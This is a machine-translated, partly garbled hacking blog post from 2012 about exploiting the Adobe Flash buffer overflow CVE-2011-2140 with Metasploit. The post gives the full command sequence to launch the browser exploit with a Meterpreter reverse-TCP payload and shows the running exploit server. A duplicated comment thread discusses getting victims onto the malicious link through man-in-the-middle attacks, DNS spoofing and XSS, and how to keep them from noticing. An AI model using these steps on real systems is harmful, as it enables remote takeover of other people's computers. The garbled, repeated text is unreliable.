ClsHack:Computer Security Blog    

[CVE-2011-2140 && Metasploit]

Gesendet am: 10 Februar 2012

Neues Modul hinzugefügt, um Metasploit :D, die Exploits Bugs in einem weiteren Flash Player.

Sicherheitsanfälligkeit, die durch die CVE-2011-2140, Hier sind die Details:

Adobe Flash Player vor 10.3.183.5 unter Windows, Mac OS X, Linux, und Solaris und vor 10.3.186.3 on Android, und Adobe AIR vor 2.7.1 unter Windows und Mac OS X und vor 2.7.1.1961 on auf Androidrmöglicht es Angreifern, beliebigen Code ausführen oder einen Denial-of-Service (Memory Corruption) über nicht näher Vektoren, eine andere Schwachstelle als CVE-2011-2135, CVE-2011-2417, und CVE-2011-2425.

Adobe Flash Player MP4 SequenceParameterSetNALUnit Pufferüberlauf

Mal sehen, wie Metasploit verwenden :D

Das erste, was zu tun ist, aktualisieren Metasploit:
sudo msfupdate

Nun starten wir Metasploit:
sudo msfconsole

Usiamo l'nutzen:
use exploit/windows/browser/adobe_flash_sps

Befehle sind immer diejenigen, :D
Wir setzen die Nutzlast:
set PAYLOAD windows/meterpreter/reverse_tcp
Konfigurieren Sie die Nutzlast:
set LHOST MY_IP
L'Configuriamo nutzen:
set URIPATH /

Jetzt setzen wir die Spieler SWF, Ich nahm aus der PoC- abysssec:
wget http://www.clshack.it/nopaste/mediaplayer.swf
set SWF_PLAYER_URI mediaplayer.swf

Wir beginnen den Exploit:
msf exploit(adobe_flash_sps) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.190:4444
[*] Using URL: http://0.0.0.0:8080/J1YpA0
[*] Local IP: http://192.168.1.190:8080/J1YpA0
[*] Server started.
msf exploit(adobe_flash_sps) >

Viel Spaß :D

Wir schicken unsere Opfer auf unserer ip:PORT , E-BAUM :D

Related posts:

  1. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote-Code Excution
  2. IE 6/7 Umfang das XML Remote Code Execution mit Metasploit
  3. [CVE:2011-4862] Remote root FreeBSD
  4. [CVE-2011-3544]Metasploit: Java Remote nicht vertrauenswürdige Java Web Start
  5. [CVE-2010-2568]Metasploit:Fenster Oday Remotecodeausführung Exuction

Dieser Eintrag wurde am Freitag, 10. Februar, 2012 bei 9:39 Uhr und ist abgelegt unter GNU / Linux, Hacking, Software. Sie können alle Antworten zu diesem Eintrag durch den RSS RSS 2.0 füttern. Sie können eine Antwort hinterlassen, oder trackback von deiner eigenen Seite.

Tagged with:
  • Salzo

    Hallo Aber das Exploit entfernt arbeiten?

    • Ac1d

      Entschuldigen Sie mich als Teil des Remote Code Execution Sie nicht verstehen?

  • Salzo

    Hallo Aber das Exploit entfernt arbeiten?

    • Ac1d

      Entschuldigen Sie mich als Teil des Remote Code Execution Sie nicht verstehen?

  • Anonym

    Aber es ist eine Client-seitige Exploits müssen den Link zu dem Opfer übergeben ;) 
    Zum Beispiel mit einem Angriff http://www.clshack.com/?s=mitm

    • Simone Formate

      so natürlich muss ich Browser des Opfers auf meine IP mit dem Port eingeben ?
      Angriff einige’ UNVERSTÄNDIG :-D

      • Anonym

        Wenn Sie im lokalen Netzwerk sind, oder Sie können aber eine MITM-Angriff ausnutzen können einige der verschiedenen Standorte XSS, usw.… ist töricht :D

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          Wenn Sie sollten außerdem einen lokalen DNS-Spoofing…oder falsch?

          • Anonym

            Sie können eine einfache Parodie ;) 

        • Simone Formate

          auch ich werde natürlich, aber man muss immer das Opfer zu erzählen, um den Link zu dieser Adresse mit Port eingeben! , damit es funktioniert…
          :-D

  • ClsHackBlog

    Aber es ist eine Client-seitige Exploits müssen den Link zu dem Opfer übergeben ;) 
    Zum Beispiel mit einem Angriff http://www.clshack.com/?s=mitm

    • Simone Formate

      so natürlich muss ich Browser des Opfers auf meine IP mit dem Port eingeben ?
      Angriff einige’ UNVERSTÄNDIG :-D

      • ClsHackBlog

        Wenn Sie im lokalen Netzwerk sind, oder Sie können aber eine MITM-Angriff ausnutzen können einige der verschiedenen Standorte XSS, usw.… ist töricht :D

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          Wenn Sie sollten außerdem einen lokalen DNS-Spoofing…oder falsch?

          • ClsHackBlog

            Sie können eine einfache Parodie ;) 

        • Simone Formate

          auch ich werde natürlich, aber man muss immer das Opfer zu erzählen, um den Link zu dieser Adresse mit Port eingeben! , damit es funktioniert…
          :-D

  • Zigfried Zorba

    Dieser Exploit nicht mit Windows XP SP3 zu arbeiten..

    • Anonym

      Versuchen Sie aktualisieren :)

  • Zigfried Zorba

    Dieser Exploit nicht mit Windows XP SP3 zu arbeiten..

    • ClsHackBlog

      Versuchen Sie aktualisieren :)

  • zacky

    Aber jetzt sind die modernen Router MITM-Angriffe zu stoppen und blockieren die Verbindung zu dem Opfer (Ich bin zufällig mit Vodafone-Station zum Beispiel) Sie tun können, um dieses Ding zu bekommen?

    • Anonym

      Wenn Sie nicht vor Ort sind, wenn Sie per Fernzugriff sind Sie müssen einen anderen Weg finden, um das Opfer rendirect nattato Ihre IP nach außen :) 

      • zacky

        Sisi meine es lokal .. mit ettercap manchmal, weil der interne Schutz von einigen Routern (zumindest glaube ich) der Angriff nicht erfolgreich ist und das Opfer Verkehr blockiert wird und nicht mehr in der Lage, navigieren!! Was können Sie in diesen Fällen zu tun?

        • Anonym

          verstehen, das Problem ist manchmal ein Problem in ettercap :D

          Ich nutzen, um scapy MITM machen und Sie etwas finden, hier im Blog ;)Ansonsten senden Sie den Link für das Opfer :D

          • zacky

            Also ich denke, es ist Zeit, um zu versuchen, installaro hehe ;)

          • zacky

            versucht, aber keinen Weg ist mein Vodafone-Station sgama die MAC und ich duplizierten Daten blockiert :S

  • zacky

    Aber jetzt sind die modernen Router MITM-Angriffe zu stoppen und blockieren die Verbindung zu dem Opfer (Ich bin zufällig mit Vodafone-Station zum Beispiel) Sie tun können, um dieses Ding zu bekommen?

    • ClsHackBlog

      Wenn Sie nicht vor Ort sind, wenn Sie per Fernzugriff sind Sie müssen einen anderen Weg finden, um das Opfer rendirect nattato Ihre IP nach außen :) 

      • zacky

        Sisi meine es lokal .. mit ettercap manchmal, weil der interne Schutz von einigen Routern (zumindest glaube ich) der Angriff nicht erfolgreich ist und das Opfer Verkehr blockiert wird und nicht mehr in der Lage, navigieren!! Was können Sie in diesen Fällen zu tun?

        • ClsHackBlog

          verstehen, das Problem ist manchmal ein Problem in ettercap :D

          Ich nutzen, um scapy MITM machen und Sie etwas finden, hier im Blog ;)Ansonsten senden Sie den Link für das Opfer :D

          • zacky

            Also ich denke, es ist Zeit, um zu versuchen, installaro hehe ;)

          • zacky

            versucht, aber keinen Weg ist mein Vodafone-Station sgama die MAC und ich duplizierten Daten blockiert :S

  • Unknownita

    Ich habe eine Frage, aber wenn ich einen dsnspoof wie Ändern der DNS in den Router durch eine Umschichtung zu dem PC des Opfers auf die Adresse infiziert. Dann, nach nicht schlechter? weil der Benutzer geben Sie es jedes Mal http://www.google.it Ende der infizierten Stelle? gibt es eine transparentere?das wird sicherlich verstehen, dass etwas nicht stimmt..

    • Unknownita

      Vielleicht eine Lösung könnte sein, es auf meine leere Seite, die leitet dann den zweiten tot nach der eigentlichen Website zu leiten?

  • Unknownita

    Ich habe eine Frage, aber wenn ich einen dsnspoof wie Ändern der DNS in den Router durch eine Umschichtung zu dem PC des Opfers auf die Adresse infiziert. Dann, nach nicht schlechter? weil der Benutzer geben Sie es jedes Mal http://www.google.it Ende der infizierten Stelle? gibt es eine transparentere?das wird sicherlich verstehen, dass etwas nicht stimmt..

    • Unknownita

      Vielleicht eine Lösung könnte sein, es auf meine leere Seite, die leitet dann den zweiten tot nach der eigentlichen Website zu leiten?